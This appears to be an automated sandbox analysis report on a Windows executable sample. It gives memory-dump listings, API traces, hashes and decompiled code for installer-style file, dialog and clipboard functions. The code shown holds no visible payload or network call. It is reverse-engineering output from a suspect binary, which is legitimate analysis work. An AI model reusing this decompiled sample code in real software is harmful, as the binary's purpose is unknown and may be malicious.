                                                                    • Associated: 00000000.00000002.215777315.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215803259.0000000000407000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215810653.0000000000409000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215841924.000000000077A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215846812.0000000000784000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215853260.0000000000788000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215865050.0000000000795000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215869937.00000000007A1000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215874471.00000000007A9000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215879765.00000000007AC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215903702.00000000007CC000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Char$Next$CreateDirectoryPrev
                                                                    • String ID: "C:\Users\user\Desktop\AQJEKNHnWK.exe" $C:\Users\user\AppData\Local\Temp\
                                                                    • API String ID: 4115351271-2492932030
                                                                    • Opcode ID: 522d963e3f3a4f438d732b49ef20f3582027ff3f63ea88c6e0be8bfaf4fc7fbc
                                                                    • Instruction ID: 6026620382323fd49234fcc764212d1b2eb381da62286567b3783a1d3151fd3a
                                                                    • Opcode Fuzzy Hash: 522d963e3f3a4f438d732b49ef20f3582027ff3f63ea88c6e0be8bfaf4fc7fbc
                                                                    • Instruction Fuzzy Hash: 41D0A92100BD3130C581322A3C06FCF091C8F8732AB00413BF80DB40C24B6C2A828AFE
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00405690, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 68%
                                                                    			E00405690(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                                    0x00405694
                                                                    0x004056a1
                                                                    0x004056b6
                                                                    0x004056bc

                                                                    APIs
                                                                    • GetFileAttributesA.KERNELBASE(00000003,00402C7D,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00405694
                                                                    • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 004056B6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.215788506.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.215777315.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215803259.0000000000407000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215810653.0000000000409000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215841924.000000000077A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215846812.0000000000784000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215853260.0000000000788000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215865050.0000000000795000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215869937.00000000007A1000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215874471.00000000007A9000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215879765.00000000007AC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215903702.00000000007CC000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: File$AttributesCreate
                                                                    • String ID:
                                                                    • API String ID: 415043291-0
                                                                    • Opcode ID: c0d98c849f492b5a4774d0bea3b1d3ff5b36842139f7d17fd49bb2e6aa7f869d
                                                                    • Instruction ID: fda52db4846bf436787418750c042d71830ab65c4a714c5a55a7f97c147c79cf
                                                                    • Opcode Fuzzy Hash: c0d98c849f492b5a4774d0bea3b1d3ff5b36842139f7d17fd49bb2e6aa7f869d
                                                                    • Instruction Fuzzy Hash: 3BD09E71658301AFEF098F20DE16F2E7AA2EB84B01F10562CFA82940E0D6755C159B16
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004030CD, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E004030CD(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409020, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                    0x004030d1
                                                                    0x004030e4
                                                                    0x004030ec
                                                                    0x00000000
                                                                    0x004030f3
                                                                    0x00000000
                                                                    0x004030f5

                                                                    APIs
                                                                    • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402F0D,000000FF,00000004,00000000,00000000,00000000), ref: 004030E4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.215788506.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.215777315.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215803259.0000000000407000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215810653.0000000000409000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215841924.000000000077A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215846812.0000000000784000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215853260.0000000000788000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215865050.0000000000795000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215869937.00000000007A1000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215874471.00000000007A9000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215879765.00000000007AC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215903702.00000000007CC000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FileRead
                                                                    • String ID:
                                                                    • API String ID: 2738559852-0
                                                                    • Opcode ID: f91aafd9ec9002b658fe048398ef4ecca8a0f43a27f2371a89b598af4e44343e
                                                                    • Instruction ID: 4fd4a8308e5d5898c176f95433ccaa972cd52e025ae54bcd1c8d1e1e5a7d5bbe
                                                                    • Opcode Fuzzy Hash: f91aafd9ec9002b658fe048398ef4ecca8a0f43a27f2371a89b598af4e44343e
                                                                    • Instruction Fuzzy Hash: FEE08C32611219BFCF105E559C01EE73F6CEB043A2F00C032F919E5190D630EA14EBA8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004030FF, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E004030FF(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409020, _a4, 0, 0); // executed
				return _t2;
			}




                                                                    0x0040310d
                                                                    0x00403113

                                                                    APIs
                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E2A,?,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 0040310D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.215788506.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.215777315.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215803259.0000000000407000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215810653.0000000000409000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215841924.000000000077A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215846812.0000000000784000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215853260.0000000000788000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215865050.0000000000795000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215869937.00000000007A1000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215874471.00000000007A9000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215879765.00000000007AC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215903702.00000000007CC000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FilePointer
                                                                    • String ID:
                                                                    • API String ID: 973152223-0
                                                                    • Opcode ID: de52c7a2a910bc3da80fb7f00694c34356361307f5662ff296472372640bc7ed
                                                                    • Instruction ID: 25801f27feaadc63e0c23ae6d5f917682d27e8bc7d9ad1472eb802ffa7caf717
                                                                    • Opcode Fuzzy Hash: de52c7a2a910bc3da80fb7f00694c34356361307f5662ff296472372640bc7ed
                                                                    • Instruction Fuzzy Hash: E4B01232954300BFDA114B00DE05F057B72B758700F208030B340380F0C2712420DB0D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Non-executed Functions

                                                                    Function 00404EA0, Relevance: 66.8, APIs: 37, Strings: 1, Instructions: 277windowclipboardmemoryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 89%
                                                                    			E00404EA0(long _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				struct tagRECT _v24;
				void* _v32;
				signed int _v36;
				int _v40;
				CHAR* _v44;
				signed int _v48;
				int _v52;
				void* _v56;
				void* _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t86;
				struct HMENU__* _t88;
				unsigned int _t91;
				int _t93;
				int _t94;
				void* _t100;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t148;
				int _t149;
				struct HWND__* _t153;
				struct HWND__* _t157;
				struct HMENU__* _t159;
				long _t161;
				CHAR* _t162;
				CHAR* _t163;

				_t153 =  *0x7a2764;
				_t148 = 0;
				_v8 = _t153;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404E34, GetDlgItem(_a4, 0x3ec), 0,  &_a4));
					}
					if(_a8 != 0x111) {
						L16:
						if(_a8 != 0x404) {
							L24:
							if(_a8 != 0x7b || _a12 != _t153) {
								goto L19;
							} else {
								_t86 = SendMessageA(_t153, 0x1004, _t148, _t148);
								_a8 = _t86;
								if(_t86 <= _t148) {
									L36:
									return 0;
								}
								_t88 = CreatePopupMenu();
								_push(0xffffffe1);
								_push(_t148);
								_t159 = _t88;
								AppendMenuA(_t159, _t148, 1, E004059E1(_t148, _t153, _t159));
								_t91 = _a16;
								if(_t91 != 0xffffffff) {
									_t149 = _t91;
									_t93 = _t91 >> 0x10;
								} else {
									GetWindowRect(_t153,  &_v24);
									_t149 = _v24.left;
									_t93 = _v24.top;
								}
								_t94 = TrackPopupMenu(_t159, 0x180, _t149, _t93, _t148, _t153, _t148);
								_t161 = 1;
								if(_t94 == 1) {
									_v56 = _t148;
									_v44 = 0x79f580;
									_v40 = 0xfff;
									_a4 = _a8;
									do {
										_a4 = _a4 - 1;
										_t161 = _t161 + SendMessageA(_v8, 0x102d, _a4,  &_v64) + 2;
									} while (_a4 != _t148);
									OpenClipboard(_t148);
									EmptyClipboard();
									_t100 = GlobalAlloc(0x42, _t161);
									_a4 = _t100;
									_t162 = GlobalLock(_t100);
									do {
										_v44 = _t162;
										SendMessageA(_v8, 0x102d, _t148,  &_v64);
										_t163 =  &(_t162[lstrlenA(_t162)]);
										 *_t163 = 0xa0d;
										_t162 =  &(_t163[2]);
										_t148 = _t148 + 1;
									} while (_t148 < _a8);
									GlobalUnlock(_a4);
									SetClipboardData(1, _a4);
									CloseClipboard();
								}
								goto L36;
							}
						}
						if( *0x7a274c == _t148) {
							ShowWindow( *0x7a2f84, 8);
							if( *0x7a300c == _t148) {
								E00404D62( *((intOrPtr*)( *0x79ed58 + 0x34)), _t148);
							}
							E00403D80(1);
							goto L24;
						}
						 *0x79e950 = 2;
						E00403D80(0x78);
						goto L19;
					} else {
						if(_a12 != 0x403) {
							L19:
							return E00403E0E(_a8, _a12, _a16);
						}
						ShowWindow( *0x7a2750, _t148);
						ShowWindow(_t153, 8);
						E0040417A();
						goto L16;
					}
				}
				_v48 = _v48 | 0xffffffff;
				_v36 = _v36 | 0xffffffff;
				_v56 = 2;
				_v52 = 0;
				_v44 = 0;
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x7a2f88;
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x7a2750 = GetDlgItem(_a4, 0x403);
				 *0x7a2748 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x7a2764 = _t127;
				_v8 = _t127;
				E00403DDC( *0x7a2750);
				 *0x7a2754 = E004045FA(4);
				 *0x7a276c = 0;
				GetClientRect(_v8,  &_v24);
				_v48 = _v24.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v56);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t148) {
					SendMessageA(_v8, 0x1024, _t148, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403DA7(_a4);
				if(( *0x7a2f90 & 0x00000003) != 0) {
					ShowWindow( *0x7a2750, _t148);
					if(( *0x7a2f90 & 0x00000002) != 0) {
						 *0x7a2750 = _t148;
					} else {
						ShowWindow(_v8, 8);
					}
				}
				_t157 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t157, 0x401, _t148, 0x75300000);
				if(( *0x7a2f90 & 0x00000004) != 0) {
					SendMessageA(_t157, 0x409, _t148, _a12);
					SendMessageA(_t157, 0x2001, _t148, _a8);
				}
				goto L36;
			}
































                                                                    0x00404ea9
                                                                    0x00404eaf
                                                                    0x00404eb8
                                                                    0x00404ebb
                                                                    0x00405048
                                                                    0x0040506c
                                                                    0x0040506c
                                                                    0x0040507f
                                                                    0x0040509c
                                                                    0x004050a3
                                                                    0x004050fa
                                                                    0x004050fe
                                                                    0x00000000
                                                                    0x00405105
                                                                    0x0040510d
                                                                    0x00405115
                                                                    0x00405118
                                                                    0x00405215
                                                                    0x00000000
                                                                    0x00405215
                                                                    0x0040511e
                                                                    0x00405124
                                                                    0x00405126
                                                                    0x00405127
                                                                    0x00405133
                                                                    0x00405139
                                                                    0x0040513f
                                                                    0x00405154
                                                                    0x0040515a
                                                                    0x00405141
                                                                    0x00405146
                                                                    0x0040514c
                                                                    0x0040514f
                                                                    0x0040514f
                                                                    0x00405168
                                                                    0x00405170
                                                                    0x00405173
                                                                    0x0040517c
                                                                    0x0040517f
                                                                    0x00405186
                                                                    0x0040518d
                                                                    0x00405195
                                                                    0x00405195
                                                                    0x004051ac
                                                                    0x004051ac
                                                                    0x004051b3
                                                                    0x004051b9
                                                                    0x004051c2
                                                                    0x004051c9
                                                                    0x004051d2
                                                                    0x004051d4
                                                                    0x004051d7
                                                                    0x004051e0
                                                                    0x004051ec
                                                                    0x004051ee
                                                                    0x004051f4
                                                                    0x004051f5
                                                                    0x004051f6
                                                                    0x004051fe
                                                                    0x00405209
                                                                    0x0040520f
                                                                    0x0040520f
                                                                    0x00000000
                                                                    0x00405173
                                                                    0x004050fe
                                                                    0x004050ab
                                                                    0x004050db
                                                                    0x004050e3
                                                                    0x004050ee
                                                                    0x004050ee
                                                                    0x004050f5
                                                                    0x00000000
                                                                    0x004050f5
                                                                    0x004050af
                                                                    0x004050b9
                                                                    0x00000000
                                                                    0x00405081
                                                                    0x00405087
                                                                    0x004050be
                                                                    0x00000000
                                                                    0x004050c7
                                                                    0x00405090
                                                                    0x00405095
                                                                    0x00405097
                                                                    0x00000000
                                                                    0x00405097
                                                                    0x0040507f
                                                                    0x00404ec1
                                                                    0x00404ec5
                                                                    0x00404ece
                                                                    0x00404ed5
                                                                    0x00404ed8
                                                                    0x00404edb
                                                                    0x00404ede
                                                                    0x00404edf
                                                                    0x00404ee0
                                                                    0x00404ef9
                                                                    0x00404efc
                                                                    0x00404f06
                                                                    0x00404f15
                                                                    0x00404f1d
                                                                    0x00404f25
                                                                    0x00404f2a
                                                                    0x00404f2d
                                                                    0x00404f39
                                                                    0x00404f42
                                                                    0x00404f4b
                                                                    0x00404f6e
                                                                    0x00404f74
                                                                    0x00404f85
                                                                    0x00404f8a
                                                                    0x00404f98
                                                                    0x00404fa6
                                                                    0x00404fa6
                                                                    0x00404fab
                                                                    0x00404fb9
                                                                    0x00404fb9
                                                                    0x00404fbe
                                                                    0x00404fc1
                                                                    0x00404fc6
                                                                    0x00404fd2
                                                                    0x00404fdb
                                                                    0x00404fe8
                                                                    0x00404ff7
                                                                    0x00404fea
                                                                    0x00404fef
                                                                    0x00404fef
                                                                    0x00404fe8
                                                                    0x0040500c
                                                                    0x00405015
                                                                    0x0040501e
                                                                    0x0040502e
                                                                    0x0040503a
                                                                    0x0040503a
                                                                    0x00000000

                                                                    APIs
                                                                    • GetDlgItem.USER32 ref: 00404EFF
                                                                    • GetDlgItem.USER32 ref: 00404F0E
                                                                    • GetDlgItem.USER32 ref: 00404F1D
                                                                      • Part of subcall function 00403DDC: SendMessageA.USER32(00000028,?,00000001,00403C0F), ref: 00403DEA
                                                                    • GetClientRect.USER32 ref: 00404F4B
                                                                    • GetSystemMetrics.USER32 ref: 00404F53
                                                                    • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00404F74
                                                                    • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00404F85
                                                                    • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 00404F98
                                                                    • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 00404FA6
                                                                    • SendMessageA.USER32(?,00001024,00000000,?), ref: 00404FB9
                                                                    • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00404FDB
                                                                    • ShowWindow.USER32(?,00000008), ref: 00404FEF
                                                                    • GetDlgItem.USER32 ref: 00405005
                                                                    • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405015
                                                                    • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040502E
                                                                    • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 0040503A
                                                                    • GetDlgItem.USER32 ref: 00405057
                                                                    • CreateThread.KERNEL32 ref: 00405065
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040506C
                                                                    • ShowWindow.USER32(00000000), ref: 00405090
                                                                    • ShowWindow.USER32(?,00000008), ref: 00405095
                                                                    • ShowWindow.USER32(00000008), ref: 004050DB
                                                                    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040510D
                                                                    • CreatePopupMenu.USER32 ref: 0040511E
                                                                    • AppendMenuA.USER32 ref: 00405133
                                                                    • GetWindowRect.USER32 ref: 00405146
                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405168
                                                                    • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004051A3
                                                                    • OpenClipboard.USER32(00000000), ref: 004051B3
                                                                    • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 004051B9
                                                                    • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 004051C2
                                                                    • GlobalLock.KERNEL32 ref: 004051CC
                                                                    • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004051E0
                                                                    • lstrlenA.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 004051E7
                                                                    • GlobalUnlock.KERNEL32(00000000,00000000,?,?,00000000,?,00000000), ref: 004051FE
                                                                    • SetClipboardData.USER32 ref: 00405209
                                                                    • CloseClipboard.USER32 ref: 0040520F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.215788506.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.215777315.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215803259.0000000000407000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215810653.0000000000409000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215841924.000000000077A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215846812.0000000000784000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215853260.0000000000788000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215865050.0000000000795000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215869937.00000000007A1000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215874471.00000000007A9000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215879765.00000000007AC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215903702.00000000007CC000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlocklstrlen
                                                                    • String ID: {
                                                                    • API String ID: 1050754034-366298937
                                                                    • Opcode ID: 4723e716c10b73e0435ed70f776bd01053d2ffbf0d5e924f1bf3189799b0a89d
                                                                    • Instruction ID: 09b722d0185256cc624264d40bb0edb6627bdfa233c056c1d5ba82df3b217a72
                                                                    • Opcode Fuzzy Hash: 4723e716c10b73e0435ed70f776bd01053d2ffbf0d5e924f1bf3189799b0a89d
                                                                    • Instruction Fuzzy Hash: 0FA14B70900208FFDB11AF64DD89AAE7F79FB48354F10812AFA05BA1A1C7785E41DF69
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004046A7, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 477windowmemoryCOMMONCrypto
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 93%
                                                                    			E004046A7(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				struct HBITMAP__* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				int _t196;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				void* _t252;
				intOrPtr _t258;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x7a2fa8;
				_t320 = SendMessageA;
				_v8 = _t182;
				_t315 = 0;
				_v32 = _t280;
				_v20 =  *0x7a2f88 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t289;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t289 + 4)) == 0x408) {
							if(( *0x7a2f91 & 0x00000002) != 0) {
								L41:
								if(_v16 != _t315) {
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) & 0xffffffdf;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E00404627(_v8, _a8 != 0x413);
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									if((_t289 & 0x00000010) == 0) {
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
										} else {
											_t300 = _t289 ^ 0x00000080;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t289 = 1;
										_a8 = 0x40f;
										_a12 = 1;
										_a16 =  !( *0x7a2f90) >> 0x00000008 & 1;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, _t315, _t315);
							}
							if(_a8 == 0x40b) {
								_t220 =  *0x79f564;
								if(_t220 != _t315) {
									ImageList_Destroy(_t220);
								}
								_t221 =  *0x79f578;
								if(_t221 != _t315) {
									GlobalFree(_t221);
								}
								 *0x79f564 = _t315;
								 *0x79f578 = _t315;
								 *0x7a2fe0 = _t315;
							}
							if(_a8 != 0x40f) {
								L86:
								if(_a8 == 0x420 && ( *0x7a2f91 & 0x00000001) != 0) {
									_t316 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t316);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
								}
								goto L89;
							} else {
								E004011EF(_t289, _t315, _t315);
								if(_a12 != _t315) {
									E00401410(8);
								}
								if(_a16 == _t315) {
									L73:
									E004011EF(_t289, _t315, _t315);
									_v32 =  *0x79f578;
									_t196 =  *0x7a2fa8;
									_v60 = 0xf030;
									_v16 = _t315;
									if( *0x7a2fac <= _t315) {
										L84:
										InvalidateRect(_v8, _t315, 1);
										if( *((intOrPtr*)( *0x7a275c + 0x10)) != _t315) {
											E00404545(0x3ff, 0xfffffffb, E004045FA(5));
										}
										goto L86;
									}
									_t281 = _t196 + 8;
									do {
										_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
										if(_t202 != _t315) {
											_t291 =  *_t281;
											_v68 = _t202;
											_v72 = 8;
											if((_t291 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t281[4]);
												_t281[0] = _t281[0] & 0x000000fe;
											}
											if((_t291 & 0x00000040) == 0) {
												_t206 = (_t291 & 0x00000001) + 1;
												if((_t291 & 0x00000010) != 0) {
													_t206 = _t206 + 3;
												}
											} else {
												_t206 = 3;
											}
											_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t291 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageA(_v8, 0x110d, _t315,  &_v72);
										}
										_v16 = _v16 + 1;
										_t281 =  &(_t281[0x106]);
									} while (_v16 <  *0x7a2fac);
									goto L84;
								} else {
									_t282 = E004012E2( *0x79f578);
									E00401299(_t282);
									_t217 = 0;
									_t289 = 0;
									if(_t282 <= _t315) {
										L72:
										SendMessageA(_v12, 0x14e, _t289, _t315);
										_a16 = _t282;
										_a8 = 0x420;
										goto L73;
									} else {
										goto L69;
									}
									do {
										L69:
										if( *((intOrPtr*)(_v20 + _t217 * 4)) != _t315) {
											_t289 = _t289 + 1;
										}
										_t217 = _t217 + 1;
									} while (_t217 < _t282);
									goto L72;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L89;
						} else {
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							if(_t283 == 0xffffffff ||  *((intOrPtr*)(_v20 + _t283 * 4)) == _t315) {
								_t283 = 0x20;
							}
							E00401299(_t283);
							SendMessageA(_a4, 0x420, _t315, _t283);
							_a12 = 1;
							_a16 = _t315;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					 *0x7a2fe0 = _a4;
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x79f578 = GlobalAlloc(0x40,  *0x7a2fac << 2);
					_v24 = LoadBitmapA( *0x7a2f80, 0x6e);
					 *0x79f574 = SetWindowLongA(_v8, 0xfffffffc, E00404CA1);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x79f564 = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
